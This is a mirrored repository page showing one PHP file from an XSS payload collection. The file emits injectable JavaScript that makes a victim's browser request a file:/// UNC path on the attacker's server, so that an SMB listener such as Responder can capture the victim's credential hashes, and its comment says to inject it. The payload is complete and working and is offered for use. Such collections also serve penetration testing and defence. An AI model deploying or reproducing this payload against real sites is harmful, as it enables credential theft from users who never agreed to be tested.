mirror of
https://github.com/nettitude/xss_payloads.git
synced 2024-11-12 23:47:06 +00:00
9 lines
223 B
PHP
9 lines
223 B
PHP
|
<?php
|
||
|
/**
|
||
|
* Inject this in order to have the browser call out to an SMB endpoint, e.g. Responder
|
||
|
*/
|
||
|
$url = "file:///\\".$_SERVER["SERVER_ADDR"];
|
||
|
echo "// $url\n";
|
||
|
?>
|
||
|
new Image().src="<?php echo $url; ?>";
|